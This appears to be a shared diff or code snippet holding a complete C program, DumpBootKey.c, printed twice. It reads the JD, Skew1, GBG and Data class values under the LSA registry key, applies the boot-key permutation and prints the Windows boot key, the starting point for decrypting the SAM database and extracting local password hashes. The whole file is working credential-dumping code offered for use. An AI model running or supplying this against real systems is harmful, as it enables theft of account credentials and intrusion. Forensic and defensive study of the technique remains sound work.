Dfte · July 4, 2024 13:49
diff --git a/DumpBootKey.c b/DumpBootKey.c
 #include <windows.h>
 #include <stdio.h>
 #define BOOT_KEY_SIZE 16
 #pragma warning(disable: 4996)

 void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
    HKEY hKey;
    LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "Error opening registry key: %ld\n", result);
        return;
    }

    result = RegQueryInfoKeyA(hKey, classValue, &classValueSize, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "Error querying registry key class: %ld\n", result);
    }
    printf("%s: %s\n", subKey, classValue);
    RegCloseKey(hKey);
 }

 void hexStringToByteArray(const char* hexString, BYTE* byteArray) {
    size_t len = strlen(hexString);
    for (size_t i = 0; i < len / 2; ++i) {
        sscanf(hexString + 2 * i, "%2hhx", &byteArray[i]);
    }
 }

 void printByteArray(const BYTE* byteArray, size_t length) {
    for (size_t i = 0; i < length; ++i) {
        printf("%02x", byteArray[i]);
    }
    printf("\n");
 }

 void permuteBootKey(BYTE* bootKey) {
    BYTE temp[BOOT_KEY_SIZE];
    memcpy(temp, bootKey, BOOT_KEY_SIZE);

    int transforms[] = { 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 };
    for (int i = 0; i < BOOT_KEY_SIZE; ++i) {
        bootKey[i] = temp[transforms[i]];
    }
 }

 int main() {
    const char* keys[] = { "JD", "Skew1", "GBG", "Data" };
    const char* basePath = "SYSTEM\\CurrentControlSet\\Control\\Lsa\\";
    char fullPath[256];
    char classValue[256];
    BYTE bootKey[BOOT_KEY_SIZE];
    size_t offset = 0;

    for (int i = 0; i < 4; ++i) {
        snprintf(fullPath, sizeof(fullPath), "%s%s", basePath, keys[i]);
        getRegistryClassValue(HKEY_LOCAL_MACHINE, fullPath, classValue, sizeof(classValue));
        hexStringToByteArray(classValue, bootKey + offset);
        offset += strlen(classValue) / 2;
    }
    permuteBootKey(bootKey);
    printf("Boot key is: ");
    printByteArray(bootKey, BOOT_KEY_SIZE);
    return 0;
 }
	#include <windows.h>
	#include <stdio.h>
	#define BOOT_KEY_SIZE 16
	#pragma warning(disable: 4996)

	void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
	HKEY hKey;
	LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
	if (result != ERROR_SUCCESS) {
	fprintf(stderr, "Error opening registry key: %ld\n", result);
	return;
	}

	result = RegQueryInfoKeyA(hKey, classValue, &classValueSize, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
	if (result != ERROR_SUCCESS) {
	fprintf(stderr, "Error querying registry key class: %ld\n", result);
	}
	printf("%s: %s\n", subKey, classValue);
	RegCloseKey(hKey);
	}

	void hexStringToByteArray(const char* hexString, BYTE* byteArray) {
	size_t len = strlen(hexString);
	for (size_t i = 0; i < len / 2; ++i) {
	sscanf(hexString + 2 * i, "%2hhx", &byteArray[i]);
	}
	}

	void printByteArray(const BYTE* byteArray, size_t length) {
	for (size_t i = 0; i < length; ++i) {
	printf("%02x", byteArray[i]);
	}
	printf("\n");
	}

	void permuteBootKey(BYTE* bootKey) {
	BYTE temp[BOOT_KEY_SIZE];
	memcpy(temp, bootKey, BOOT_KEY_SIZE);

	int transforms[] = { 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 };
	for (int i = 0; i < BOOT_KEY_SIZE; ++i) {
	bootKey[i] = temp[transforms[i]];
	}
	}

	int main() {
	const char* keys[] = { "JD", "Skew1", "GBG", "Data" };
	const char* basePath = "SYSTEM\\CurrentControlSet\\Control\\Lsa\\";
	char fullPath[256];
	char classValue[256];
	BYTE bootKey[BOOT_KEY_SIZE];
	size_t offset = 0;

	for (int i = 0; i < 4; ++i) {
	snprintf(fullPath, sizeof(fullPath), "%s%s", basePath, keys[i]);
	getRegistryClassValue(HKEY_LOCAL_MACHINE, fullPath, classValue, sizeof(classValue));
	hexStringToByteArray(classValue, bootKey + offset);
	offset += strlen(classValue) / 2;
	}
	permuteBootKey(bootKey);
	printf("Boot key is: ");
	printByteArray(bootKey, BOOT_KEY_SIZE);
	return 0;
	}